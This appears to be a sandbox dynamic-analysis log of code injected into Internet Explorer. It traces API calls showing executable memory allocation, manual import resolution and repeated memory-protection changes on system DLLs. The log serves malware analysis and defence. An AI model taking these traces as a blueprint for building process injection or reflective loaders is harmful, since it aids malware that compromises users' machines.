	[0191.216] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x7562cae2, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x5a5fca8 | out: lpflOldProtect=0x5a5fca8*=0x40) returned 1
	[0191.217] socket (af=2, type=1, protocol=6) returned 0x51c
	[0191.218] WSAIoctl (in: s=0x51c, dwIoControlCode=0xc8000006, lpvInBuffer=0x5a5fe08, cbInBuffer=0x10, lpvOutBuffer=0x5a5fe00, cbOutBuffer=0x4, lpcbBytesReturned=0x5a5fe04, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x5a5fe00, lpcbBytesReturned=0x5a5fe04, lpOverlapped=0x0) returned 0
	[0191.218] closesocket (s=0x51c) returned 0
	[0191.219] GetModuleHandleA (lpModuleName=0x0) returned 0xc50000
	[0191.219] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x74f17852, dwSize=0x7, flNewProtect=0x40, lpflOldProtect=0x5a5fcc0 | out: lpflOldProtect=0x5a5fcc0*=0x20) returned 1
	[0191.221] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x74f17852, dwSize=0x7, flNewProtect=0x20, lpflOldProtect=0x5a5fcc0 | out: lpflOldProtect=0x5a5fcc0*=0x40) returned 1

Thread:
	id = 341
	os_tid = 0xbbc


Process:
	id = "37"
	image_name = "iexplore.exe"
	filename = "c:\\program files\\internet explorer\\iexplore.exe"
	page_root = "0x7ee17620"
	os_pid = "0xc94"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "injection"
	parent_id = "35"
	os_parent_pid = "0x110"
	cmd_line = "\"C:\\Program Files\\Internet Explorer\\iexplore.exe\" SCODEF:3128 CREDAT:14337"
	cur_dir = "C:\\Users\\2XC7u663GxWc\\Desktop\\"
	os_username = "ZGW5TDPU\\2XC7u663GxWc"
	bitness = "64"
	os_groups = "ZGW5TDPU\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ece3" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 193
	os_tid = 0xe3c


Thread:
	id = 194
	os_tid = 0xe14


Thread:
	id = 195
	os_tid = 0xe04


Thread:
	id = 196
	os_tid = 0xdfc


Thread:
	id = 197
	os_tid = 0xce4


Thread:
	id = 198
	os_tid = 0xce0


Thread:
	id = 199
	os_tid = 0xcdc


Thread:
	id = 200
	os_tid = 0xcd8


Thread:
	id = 201
	os_tid = 0xcd4


Thread:
	id = 202
	os_tid = 0xcd0


Thread:
	id = 203
	os_tid = 0xccc


Thread:
	id = 204
	os_tid = 0xcc8


Thread:
	id = 205
	os_tid = 0xcb8


Thread:
	id = 206
	os_tid = 0xcb4


Thread:
	id = 207
	os_tid = 0xcac


Thread:
	id = 208
	os_tid = 0xca8


Thread:
	id = 209
	os_tid = 0xca4


Thread:
	id = 210
	os_tid = 0xc9c


Thread:
	id = 211
	os_tid = 0xc98


Thread:
	id = 212
	os_tid = 0xbcc

	[0193.794] VirtualAlloc (lpAddress=0x0, dwSize=0x18000, flAllocationType=0x3000, flProtect=0x40) returned 0x1ab0000
	[0193.795] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76b10000
	[0193.796] GetProcAddress (hModule=0x76b10000, lpProcName="GetExitCodeThread") returned 0x76b46ddd
	[0193.796] GetProcAddress (hModule=0x76b10000, lpProcName="WaitForSingleObject") returned 0x76b5ba90
	[0193.796] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0193.797] GetProcAddress (hModule=0x76b10000, lpProcName="Sleep") returned 0x76b5ba46
	[0193.797] GetProcAddress (hModule=0x76b10000, lpProcName="CreateThread") returned 0x76b6375d
	[0193.797] GetProcAddress (hModule=0x76b10000, lpProcName="CloseHandle") returned 0x76b5ca7c
	[0193.797] GetProcAddress (hModule=0x76b10000, lpProcName="GetModuleHandleA") returned 0x76b5cf41
	[0193.798] GetProcAddress (hModule=0x76b10000, lpProcName="CreateFileW") returned 0x76b5cc56
	[0193.798] GetProcAddress (hModule=0x76b10000, lpProcName="DecodePointer") returned 0x7738cd10
	[0193.798] GetProcAddress (hModule=0x76b10000, lpProcName="WriteConsoleW") returned 0x76b582f1
	[0193.798] GetProcAddress (hModule=0x76b10000, lpProcName="UnhandledExceptionFilter") returned 0x76b6ed38
	[0193.799] GetProcAddress (hModule=0x76b10000, lpProcName="SetUnhandledExceptionFilter") returned 0x76b63d01
	[0193.799] GetProcAddress (hModule=0x76b10000, lpProcName="GetCurrentProcess") returned 0x76b5cdcf
	[0193.799] GetProcAddress (hModule=0x76b10000, lpProcName="TerminateProcess") returned 0x76b52331
	[0193.800] GetProcAddress (hModule=0x76b10000, lpProcName="IsProcessorFeaturePresent") returned 0x76b676b5
	[0193.800] GetProcAddress (hModule=0x76b10000, lpProcName="QueryPerformanceCounter") returned 0x76b5bb9f
	[0193.800] GetProcAddress (hModule=0x76b10000, lpProcName="GetCurrentProcessId") returned 0x76b5cac4
	[0193.800] GetProcAddress (hModule=0x76b10000, lpProcName="GetCurrentThreadId") returned 0x76b5bb80
	[0193.801] GetProcAddress (hModule=0x76b10000, lpProcName="GetSystemTimeAsFileTime") returned 0x76b62fde
	[0193.801] GetProcAddress (hModule=0x76b10000, lpProcName="InitializeSListHead") returned 0x77395eeb
	[0193.801] GetProcAddress (hModule=0x76b10000, lpProcName="IsDebuggerPresent") returned 0x76b53ea8
	[0193.802] GetProcAddress (hModule=0x76b10000, lpProcName="GetStartupInfoW") returned 0x76b63891
	[0193.802] GetProcAddress (hModule=0x76b10000, lpProcName="GetModuleHandleW") returned 0x76b6374d
	[0193.802] GetProcAddress (hModule=0x76b10000, lpProcName="InterlockedExchange") returned 0x76b5bf0a
	[0193.802] GetProcAddress (hModule=0x76b10000, lpProcName="VirtualFree") returned 0x76b61da4
	[0193.803] GetProcAddress (hModule=0x76b10000, lpProcName="VirtualAlloc") returned 0x76b62fb6
	[0193.803] GetProcAddress (hModule=0x76b10000, lpProcName="LoadLibraryA") returned 0x76b6395c
	[0193.803] GetProcAddress (hModule=0x76b10000, lpProcName="VirtualProtectEx") returned 0x76b9f5d9
	[0193.803] GetProcAddress (hModule=0x76b10000, lpProcName="GetModuleFileNameA") returned 0x76b633f6
	[0193.804] GetProcAddress (hModule=0x76b10000, lpProcName="lstrcmpiA") returned 0x76b52249
	[0193.804] GetProcAddress (hModule=0x76b10000, lpProcName="HeapFree") returned 0x76b5bbd0
	[0193.804] GetProcAddress (hModule=0x76b10000, lpProcName="HeapReAlloc") returned 0x7739ff51
	[0193.805] GetProcAddress (hModule=0x76b10000, lpProcName="HeapAlloc") returned 0x77382dd6
	[0193.805] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcessHeap") returned 0x76b61280
	[0193.805] GetProcAddress (hModule=0x76b10000, lpProcName="lstrcmpA") returned 0x76b48c59
	[0193.805] GetProcAddress (hModule=0x76b10000, lpProcName="lstrcpyA") returned 0x76b59793
	[0193.806] GetProcAddress (hModule=0x76b10000, lpProcName="HeapSize") returned 0x77389bec
	[0193.806] GetProcAddress (hModule=0x76b10000, lpProcName="InterlockedFlushSList") returned 0x77383129
	[0193.806] GetProcAddress (hModule=0x76b10000, lpProcName="RtlUnwind") returned 0x76b47f70
	[0193.807] GetProcAddress (hModule=0x76b10000, lpProcName="GetLastError") returned 0x76b5bf00
	[0193.807] GetProcAddress (hModule=0x76b10000, lpProcName="SetLastError") returned 0x76b5bb08
	[0193.807] GetProcAddress (hModule=0x76b10000, lpProcName="EnterCriticalSection") returned 0x773777a0
	[0193.807] GetProcAddress (hModule=0x76b10000, lpProcName="LeaveCriticalSection") returned 0x77377760
	[0193.808] GetProcAddress (hModule=0x76b10000, lpProcName="DeleteCriticalSection") returned 0x77389ac5
	[0193.808] GetProcAddress (hModule=0x76b10000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76b63939
	[0193.808] GetProcAddress (hModule=0x76b10000, lpProcName="TlsAlloc") returned 0x76b635a1
	[0193.808] GetProcAddress (hModule=0x76b10000, lpProcName="TlsGetValue") returned 0x76b5da70
	[0193.809] GetProcAddress (hModule=0x76b10000, lpProcName="TlsSetValue") returned 0x76b5da88
	[0193.809] GetProcAddress (hModule=0x76b10000, lpProcName="TlsFree") returned 0x76b613b8
	[0193.809] GetProcAddress (hModule=0x76b10000, lpProcName="FreeLibrary") returned 0x76b5d9d0
	[0193.810] GetProcAddress (hModule=0x76b10000, lpProcName="LoadLibraryExW") returned 0x76b54775
	[0193.810] GetProcAddress (hModule=0x76b10000, lpProcName="RaiseException") returned 0x76b4eb60
	[0193.810] GetProcAddress (hModule=0x76b10000, lpProcName="ExitProcess") returned 0x76b6214f
	[0193.810] GetProcAddress (hModule=0x76b10000, lpProcName="GetModuleHandleExW") returned 0x76b53e39
	[0193.811] GetProcAddress (hModule=0x76b10000, lpProcName="MultiByteToWideChar") returned 0x76b6452b
	[0193.811] GetProcAddress (hModule=0x76b10000, lpProcName="WideCharToMultiByte") returned 0x76b6450e
	[0193.811] GetProcAddress (hModule=0x76b10000, lpProcName="LCMapStringW") returned 0x76b613d0
	[0193.811] GetProcAddress (hModule=0x76b10000, lpProcName="FindClose") returned 0x76b60e62
	[0193.812] GetProcAddress (hModule=0x76b10000, lpProcName="FindFirstFileExA") returned 0x76b9f3ef
	[0193.812] GetProcAddress (hModule=0x76b10000, lpProcName="FindNextFileA") returned 0x76b5a187
	[0193.812] GetProcAddress (hModule=0x76b10000, lpProcName="IsValidCodePage") returned 0x76b6c1c0
	[0193.813] GetProcAddress (hModule=0x76b10000, lpProcName="GetACP") returned 0x76b639aa
	[0193.813] GetProcAddress (hModule=0x76b10000, lpProcName="GetOEMCP") returned 0x76b53db9
	[0193.813] GetProcAddress (hModule=0x76b10000, lpProcName="GetCPInfo") returned 0x76b61e2e
	[0193.813] GetProcAddress (hModule=0x76b10000, lpProcName="GetCommandLineA") returned 0x76b698ff
	[0193.814] GetProcAddress (hModule=0x76b10000, lpProcName="GetCommandLineW") returned 0x76b6679e
	[0193.814] GetProcAddress (hModule=0x76b10000, lpProcName="GetEnvironmentStringsW") returned 0x76b61dbc
	[0193.814] GetProcAddress (hModule=0x76b10000, lpProcName="FreeEnvironmentStringsW") returned 0x76b61dc3
	[0193.814] GetProcAddress (hModule=0x76b10000, lpProcName="GetStdHandle") returned 0x76b61e46
	[0193.815] GetProcAddress (hModule=0x76b10000, lpProcName="GetFileType") returned 0x76b675a5
	[0193.815] GetProcAddress (hModule=0x76b10000, lpProcName="GetStringTypeW") returned 0x76b667c8
	[0193.815] GetProcAddress (hModule=0x76b10000, lpProcName="SetStdHandle") returned 0x76b9f589
	[0193.816] GetProcAddress (hModule=0x76b10000, lpProcName="WriteFile") returned 0x76b61400
	[0193.816] GetProcAddress (hModule=0x76b10000, lpProcName="FlushFileBuffers") returned 0x76b47f81
	[0193.816] GetProcAddress (hModule=0x76b10000, lpProcName="GetConsoleCP") returned 0x76b62c8a
	[0193.816] GetProcAddress (hModule=0x76b10000, lpProcName="GetConsoleMode") returned 0x76b62412
	[0193.817] GetProcAddress (hModule=0x76b10000, lpProcName="SetFilePointerEx") returned 0x76b4f5b2
	[0193.817] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x75a90000
	[0193.817] GetProcAddress (hModule=0x75a90000, lpProcName="WSAIoctl") returned 0x75a92fe7
	[0193.817] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x771d0000
	[0193.818] GetProcAddress (hModule=0x771d0000, lpProcName="PathFindFileNameA") returned 0x771e00aa
	[0193.818] GetProcAddress (hModule=0x771d0000, lpProcName="StrChrA") returned 0x771dc5e6
	[0193.819] NtFlushInstructionCache (ProcessHandle=0xffffffff, BaseAddress=0x0, NumberOfBytesToFlush=0x0) returned 0x0
	[0193.819] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x502f850 | out: lpSystemTimeAsFileTime=0x502f850*(dwLowDateTime=0x5ccf1500, dwHighDateTime=0x1d50a6a)) 
	[0193.819] GetCurrentThreadId () returned 0xbcc
	[0193.819] GetCurrentProcessId () returned 0xc94
	[0193.819] QueryPerformanceCounter (in: lpPerformanceCount=0x502f848 | out: lpPerformanceCount=0x502f848*=26765669733) returned 1
	[0193.819] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1
	[0193.819] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0
	[0193.819] GetLastError () returned 0x57
	[0193.819] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x0) returned 0x6c330000
	[0193.821] GetProcAddress (hModule=0x6c330000, lpProcName="InitializeCriticalSectionEx") returned 0x0
	[0193.821] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0
	[0193.821] GetLastError () returned 0x57
	[0193.821] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x0) returned 0x0
	[0193.822] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0
	[0193.822] GetLastError () returned 0x57
	[0193.822] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76b10000
	[0193.822] GetProcAddress (hModule=0x76b10000, lpProcName="FlsAlloc") returned 0x76b6418d
	[0193.823] GetProcAddress (hModule=0x76b10000, lpProcName="FlsSetValue") returned 0x76b676e6
	[0193.823] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0
	[0193.823] GetLastError () returned 0x57
	[0193.823] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x0) returned 0x6c330000
	[0193.824] GetProcAddress (hModule=0x6c330000, lpProcName="InitializeCriticalSectionEx") returned 0x0
	[0193.824] GetProcessHeap () returned 0x90000
	[0193.824] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0
	[0193.824] GetLastError () returned 0x57
	[0193.824] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x0) returned 0x0
	[0193.824] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0
	[0193.824] GetLastError () returned 0x57
	[0193.824] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76b10000
	[0193.825] GetProcAddress (hModule=0x76b10000, lpProcName="FlsAlloc") returned 0x76b6418d
	[0193.825] GetLastError () returned 0x57
	[0193.825] GetProcAddress (hModule=0x76b10000, lpProcName="FlsGetValue") returned 0x76b61e16
	[0193.825] RtlAllocateHeap (HeapHandle=0x90000, Flags=0x8, Size=0x364) returned 0x4718538
	[0193.825] GetProcAddress (hModule=0x76b10000, lpProcName="FlsSetValue") returned 0x76b676e6
	[0193.825] SetLastError (dwErrCode=0x57) 
	[0193.826] RtlAllocateHeap (HeapHandle=0x90000, Flags=0x8, Size=0xc00) returned 0x46c1f10
	[0193.826] GetStartupInfoW (in: lpStartupInfo=0x502f71c | out: lpStartupInfo=0x502f71c*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="Microsoft.InternetExplorer.Default", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1000, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1ab3130, hStdOutput=0x62ef71e1, hStdError=0xfffffffe)) 
	[0193.826] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0
	[0193.827] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0
	[0193.827] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0
	[0193.827] GetCommandLineA () returned="\"C:\\Program Files\\Internet Explorer\\iexplore.exe\" SCODEF:3128 CREDAT:14337"
	[0193.827] GetCommandLineW () returned="\"C:\\Program Files\\Internet Explorer\\iexplore.exe\" SCODEF:3128 CREDAT:14337"
	[0193.827] GetLastError () returned 0x57
	[0193.827] SetLastError (dwErrCode=0x57) 
	[0193.827] GetLastError () returned 0x57
	[0193.827] SetLastError (dwErrCode=0x57) 
	[0193.827] GetACP () returned 0x4e4
	[0193.827] RtlAllocateHeap (HeapHandle=0x90000, Flags=0x0, Size=0x220) returned 0x147f90
	[0193.827] IsValidCodePage (CodePage=0x4e4) returned 1
	[0193.827] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x502f74c | out: lpCPInfo=0x502f74c) returned 1
	[0193.827] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x502f014 | out: lpCPInfo=0x502f014) returned 1
	[0193.827] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x502f628, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256
	[0193.827] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x502f628, cbMultiByte=256, lpWideCharStr=0x502edb8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256
	[0193.827] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x502f028 | out: lpCharType=0x502f028) returned 1
	[0193.827] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x502f628, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256
	[0193.827] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x502f628, cbMultiByte=256, lpWideCharStr=0x502ed68, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256
	[0193.827] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x0
	[0193.827] GetLastError () returned 0x57
	[0193.827] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x0) returned 0x0
	[0193.828] GetProcAddress (hModule=0x76b10000, lpProcName="LCMapStringEx") returned 0x76b9f72b
	[0193.828] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256
	[0193.828] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x502eb58, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256
	[0193.828] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0x502f528, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x25\xa2\x41\x66\x64\xf7\x02\x05\xce\x6c\xab\x01\x90\x7f\x14", lpUsedDefaultChar=0x0) returned 256
	[0193.828] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x502f628, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256
